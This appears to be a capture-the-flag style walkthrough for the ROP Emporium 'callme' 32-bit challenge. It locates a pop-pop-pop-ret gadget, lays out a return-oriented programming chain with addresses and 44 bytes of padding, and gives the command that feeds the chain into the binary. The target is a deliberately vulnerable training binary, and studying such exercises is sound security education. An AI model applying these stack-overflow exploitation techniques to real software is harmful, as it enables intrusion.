callme
======

Get the 32-bit `callme` binary from the
[URL on ropemporium.com](https://ropemporium.com/binary/callme32.zip):

    curl -O https://ropemporium.com/binary/callme32.zip
    unzip callme32.zip

According to the instructions, we need to call each of three `callme_*`
functions in order, each with the arguments `(1,2,3)`. In other words, we need
the equivalent of the following C code:

    callme_one(1,2,3);
    callme_two(1,2,3);
    callme_three(1,2,3);

...or the following assembly (recalling that arguments get pushed in reverse
order) repeated for each of the three functions:

    push 3
    push 2
    push 1
    call <callme_one@plt>

Finally, we'll need a gadget that clears our parameters off the stack so we can
return into the next call. Looking through a dump of the binary, we find this:

    0x080488a9      5e             pop esi
    0x080488aa      5f             pop edi
    0x080488ab      5d             pop ebp
    0x080488ac      c3             ret

This will clear three words off the stack, then return to the next address on
the stack.

The following chain does what we want:

    080485c0    // callme_one@plt
    080488a9    // pop esi; pop edi; pop ebp; ret
    00000001    // first argument
    00000002    // second argument
    00000003    // third argument

All we need to do now is repeat it for each call and pad the front with 44 bytes
to overflow the buffer. A full chain can be found in `chain.hex`. We can run it
as follows:

    $ xxd -r -p chain.hex | xxd -e | xxd -r | ./callme32

The extra invocations to `xxd` swap the byte order to little endian.
